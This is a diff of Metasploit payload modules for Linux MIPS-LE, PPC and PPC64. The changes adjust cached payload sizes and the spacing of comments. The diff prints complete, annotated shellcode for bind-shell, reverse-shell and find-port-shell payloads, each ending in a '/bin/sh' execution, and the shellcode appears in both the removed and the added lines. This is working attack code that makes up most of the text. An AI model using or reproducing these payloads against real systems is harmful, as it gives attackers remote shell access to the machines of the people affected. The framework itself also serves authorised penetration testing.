@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
module MetasploitModule
CachedSize = 1286264
CachedSize = 1286336
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
module MetasploitModule
CachedSize = 1286264
CachedSize = 1286336
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
module MetasploitModule
CachedSize = 1286264
CachedSize = 1286336
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
View File

@ -74,7 +74,7 @@ module MetasploitModule
port.pack("C2") + "\xce\x35" + # ori t6,t6,0x1f90
"\xe4\xff\xae\xaf" + # sw t6,-28(sp)
host[2..3].pack("C2") + "\x0e\x3c" + # lui t6,0x7f01
host[0..1].pack("C2") + "\xce\x35" +# ori t6,t6,0x101
host[0..1].pack("C2") + "\xce\x35" + # ori t6,t6,0x101
"\xe6\xff\xae\xaf" + # sw t6,-26(sp)
"\xe2\xff\xa5\x27" + # addiu a1,sp,-30
"\xef\xff\x0c\x24" + # li t4,-17

2
modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
module MetasploitModule
CachedSize = 1060824
CachedSize = 1060864
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
module MetasploitModule
CachedSize = 1060824
CachedSize = 1060864
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

2
modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
module MetasploitModule
CachedSize = 1060824
CachedSize = 1060864
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

108
modules/payloads/singles/linux/ppc/shell_bind_tcp.rb
View File

@ -32,60 +32,60 @@ module MetasploitModule
'LPORT' => [ 58, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\xff\x02" +# lis r23,-254 #
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x7c\x36\x0b\x78" +# mr r22,r1 #
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) #
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x75\x1b\x78" +# mr r21,r3 #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7e\xa3\xab\x78" +# mr r3,r21 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <bndsockcode+148> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode+172> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
"\x3b\xa0\x01\xff" + # li r29,511 #
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x97\x81\xff\xfc" + # stwu r28,-4(r1) #
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
"\x3e\xe0\xff\x02" + # lis r23,-254 #
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
"\x7c\x36\x0b\x78" + # mr r22,r1 #
"\x97\x21\xff\xfc" + # stwu r25,-4(r1) #
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x75\x1b\x78" + # mr r21,r3 #
"\x7f\x64\xdb\x78" + # mr r4,r27 #
"\x7e\xa3\xab\x78" + # mr r3,r21 #
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
"\x44\xff\xff\x02" + # sc #
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
"\x40\x80\xff\xec" + # bge+ <bndsockcode+148> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode+172> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
"\x94\xa1\xff\xfc" + # stwu r5,-4(r1) #
"\x94\x61\xff\xfc" + # stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
"\x44\xff\xff\x02" + # sc #
"/bin/sh"
}
))

82
modules/payloads/singles/linux/ppc/shell_find_port.rb
View File

@ -32,47 +32,47 @@ module MetasploitModule
'CPORT' => [ 86, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x3a\x0b\x78" +# mr r26,r1 #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x3b\xff\x01\xff" +# addi r31,r31,511 #
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 #
"\x38\x21\x01\xff" +# addi r1,r1,511 #
"\x38\x21\xfe\x05" +# addi r1,r1,-507 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x3b\x3c\x01\xff" +# addi r25,r28,511 #
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) #
"\x28\x19\x04\xd2" +# cmplwi r25,1234 #
"\x40\x82\xff\xd0" +# bne+ <fndsockcode+40> #
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 #
"\x7f\x04\xc3\x78" +# mr r4,r24 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x18\xff\xff" +# addic. r24,r24,-1 #
"\x40\x80\xff\xec" +# bge+ <fndsockcode+96> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode+120> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
"\x3b\xa0\x01\xff" + # li r29,511 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
"\x3b\x7d\xfe\x11" + # addi r27,r29,-495 #
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
"\x7c\x3a\x0b\x78" + # mr r26,r1 #
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
"\x97\x81\xff\xfc" + # stwu r28,-4(r1) #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x3b\xff\x01\xff" + # addi r31,r31,511 #
"\x3b\xff\xfe\x02" + # addi r31,r31,-510 #
"\x38\x21\x01\xff" + # addi r1,r1,511 #
"\x38\x21\xfe\x05" + # addi r1,r1,-507 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
"\x40\x82\xff\xd0" + # bne+ <fndsockcode+40> #
"\x3b\x1d\xfe\x03" + # addi r24,r29,-509 #
"\x7f\x04\xc3\x78" + # mr r4,r24 #
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
"\x44\xff\xff\x02" + # sc #
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
"\x40\x80\xff\xec" + # bge+ <fndsockcode+96> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel+ <fndsockcode+120> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
"\x94\xa1\xff\xfc" + # stwu r5,-4(r1) #
"\x94\x61\xff\xfc" + # stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
"\x44\xff\xff\x02" + # sc #
"/bin/sh"
}
))

88
modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb
View File

@ -33,50 +33,50 @@ module MetasploitModule
'LPORT' => [ 62, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\x7f\x00" +# lis r23,32512 #
"\x62\xf7\x00\x01" +# ori r23,r23,1 #
"\x3a\xc0\x04\xd2" +# li r22,1234 #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
"\x93\x61\xff\xfe" +# stw r27,-2(r1) #
"\x7c\x35\x0b\x78" +# mr r21,r1 #
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) #
"\x96\xa1\xff\xfc" +# stwu r21,-4(r1) #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7f\x43\xd3\x78" +# mr r3,r26 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <cntsockcode+108> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode+132> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
"\x3b\xa0\x01\xff" + # li r29,511 #
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x97\x81\xff\xfc" + # stwu r28,-4(r1) #
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
"\x3a\xc0\x04\xd2" + # li r22,1234 #
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
"\x7c\x35\x0b\x78" + # mr r21,r1 #
"\x97\x21\xff\xfc" + # stwu r25,-4(r1) #
"\x96\xa1\xff\xfc" + # stwu r21,-4(r1) #
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7f\x64\xdb\x78" + # mr r4,r27 #
"\x7f\x43\xd3\x78" + # mr r3,r26 #
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
"\x44\xff\xff\x02" + # sc #
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
"\x40\x80\xff\xec" + # bge+ <cntsockcode+108> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode+132> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
"\x94\xa1\xff\xfc" + # stwu r5,-4(r1) #
"\x94\x61\xff\xfc" + # stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
"\x44\xff\xff\x02" + # sc #
"/bin/sh"
}
))

108
modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb
View File

@ -32,60 +32,60 @@ module MetasploitModule
'LPORT' => [ 58, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
"\xfb\x61\xff\xf9" +# stdu r27,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\xff\x02" +# lis r23,-254 #
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x7c\x36\x0b\x78" +# mr r22,r1 #
"\xfb\x21\xff\xf9" +# stdu r25,-8(r1) #
"\xfa\xc1\xff\xf9" +# stdu r22,-8(r1) #
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x75\x1b\x78" +# mr r21,r3 #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7e\xa3\xab\x78" +# mr r3,r21 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <bndsockcode64+148> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode64+172> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
"\x3b\xa0\x01\xff" + # li r29,511 #
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
"\x3e\xe0\xff\x02" + # lis r23,-254 #
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
"\x7c\x36\x0b\x78" + # mr r22,r1 #
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
"\xfa\xc1\xff\xf9" + # stdu r22,-8(r1) #
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x75\x1b\x78" + # mr r21,r3 #
"\x7f\x64\xdb\x78" + # mr r4,r27 #
"\x7e\xa3\xab\x78" + # mr r3,r21 #
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
"\x44\xff\xff\x02" + # sc #
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
"\x40\x80\xff\xec" + # bge+ <bndsockcode64+148> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode64+172> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
"\x44\xff\xff\x02" + # sc #
"/bin/sh"
}
))

82
modules/payloads/singles/linux/ppc64/shell_find_port.rb
View File

@ -32,47 +32,47 @@ module MetasploitModule
'CPORT' => [ 86, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x3a\x0b\x78" +# mr r26,r1 #
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\x3b\xff\x01\xff" +# addi r31,r31,511 #
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 #
"\x38\x21\x01\xff" +# addi r1,r1,511 #
"\x38\x21\xfe\x09" +# addi r1,r1,-503 #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x3b\x3c\x01\xff" +# addi r25,r28,511 #
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) #
"\x28\x19\x04\xd2" +# cmplwi r25,1234 #
"\x40\x82\xff\xd0" +# bne+ <fndsockcode64+40> #
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 #
"\x7f\x04\xc3\x78" +# mr r4,r24 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x18\xff\xff" +# addic. r24,r24,-1 #
"\x40\x80\xff\xec" +# bge+ <fndsockcode64+96> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode64+120> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
"\x3b\xa0\x01\xff" + # li r29,511 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
"\x3b\x7d\xfe\x11" + # addi r27,r29,-495 #
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
"\x7c\x3a\x0b\x78" + # mr r26,r1 #
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
"\x3b\xff\x01\xff" + # addi r31,r31,511 #
"\x3b\xff\xfe\x02" + # addi r31,r31,-510 #
"\x38\x21\x01\xff" + # addi r1,r1,511 #
"\x38\x21\xfe\x09" + # addi r1,r1,-503 #
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
"\x40\x82\xff\xd0" + # bne+ <fndsockcode64+40> #
"\x3b\x1d\xfe\x03" + # addi r24,r29,-509 #
"\x7f\x04\xc3\x78" + # mr r4,r24 #
